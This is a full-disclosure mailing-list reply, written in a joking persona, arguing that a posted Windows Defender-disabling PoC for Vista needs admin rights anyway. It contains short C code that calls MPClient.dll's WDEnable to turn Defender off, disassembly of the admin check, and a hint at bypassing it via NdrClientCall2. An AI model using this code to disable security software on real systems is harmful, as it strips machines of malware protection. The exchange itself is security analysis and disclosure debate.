[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] [Wired Security/EOF] Disable Windows Defender (Vista) PoC code
- To: "Peter Ferrie" <peter.ferrie@xxxxxxxxx>, skyout.fd@xxxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] [Wired Security/EOF] Disable Windows Defender (Vista) PoC code
- From: "Fredrick Diggle" <fdiggle@xxxxxxxxx>
- Date: Wed, 14 May 2008 23:10:42 -0500
HAHAHA Fredrick Diggle thinks that skyout was running his el8 assembly
machine program in a debugger running as administrator :( opps...
for the kids to test at home fred diggle has written easier program
which isn't as el8 (fred doesn't know the computer assembly language
as he is lowly zoo worker) but also isn't as dumb
#include "windows.h"
#define INFINITY_PLUS_1 0 // important DO NOT CHANGE
/*
by defining the diggle license agreement secret sauce
you are agreeing that fredrick diggle is far better
than you will ever be and also that you will give him
all your money please
*/
#ifdef DIGGLE_LICENSE_AGREEMENT
typedef int (WINAPI *diggle)(BOOL hippo);
#endif
int main() {
HMODULE dlliggle;
diggle WDEnable;
dlliggle = LoadLibrary(L"C:\\Program Files\\Windows
Defender\\MPClient.dll");
WDEnable = (diggle) GetProcAddress(dlliggle, (LPCSTR) "WDEnable");
WDEnable((BOOL)INFINITY_PLUS_1);
return INFINITY_PLUS_1; // <- THIS IS CRITICAL
}
doesn't work if fred is not admin :( <- sad face
Why could this be when skyout says it will?!?!?!?!
from MPClient.dll
WDEnable()
...
.text:30C12858 loc_30C12858: ; CODE XREF:
WDEnable(x)+16Ej
.text:30C12858 call _MpFeatureDisable@8 ; THis is
teh call that Matters ++++++
...
MpFeatureDisable()
...
.text:30C0C8A9 lea eax, [ebp+var_4]
.text:30C0C8AC push eax ; int
.text:30C0C8AD push ebx ; int
.text:30C0C8AE call _IsAdminOrSystem@8 ;
IsAdminOrSystem(x,x) Opps :((((((((
...
so Fredrick thought in Freds mind, well gee golly this checks if fred
is an admin but I can control this code eh (disclaimer: fred is not
canadian)... so what happens if fred makes this code do "mov DWORD PTR
SS:[EBP-4], 1" instead of that nasty admin checking?
well fred discovered that it basically calls into NdrClientCall2()
which can be viewed for pleasure here ->
http://msdn.microsoft.com/en-us/library/aa374215(VS.85).aspx
see ----v
ClientMpDisableFeature()
...
.text:30C14FBA lea eax, [ebp+arg_0]
.text:30C14FBD push eax
.text:30C14FBE push offset byte_30C01AFE ; pFormat
.text:30C14FC3 push offset pStubDescriptor ; pStubDescriptor
.text:30C14FC8 call _NdrClientCall2 <- HELLo you
devilish monkey
...
and although fred did not reverse this nastiness today he assures skyout that
1) MPClient.dll checks for admin privs (not that it matters)
2) even if it didn't this call wouldn't let you turn off defender
without admin privs, if you want to find a way start ^--- there
3) his children will be plentiful with full heads of hair (but one
might potentially be a midget... :D)
Fred diggle must go see if the hippo brushed his teeth before going to bed now
good bye friends!
On Wed, May 14, 2008 at 3:49 PM, Peter Ferrie <peter.ferrie@xxxxxxxxx> wrote:
>> my friend Izee from the EOF-Project(.net) team has coded a
>> simple PoC code, that demonstrates how to disable the Windows
>> Defender on Vista (tested with and without SPs on x86/x64)
>> using its own API made for it.
>
> Does he realise that he must be Admin first?
> Then he he can just disable the service, or delete the files, or whatever.
> Using the API doesn't gain much here.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/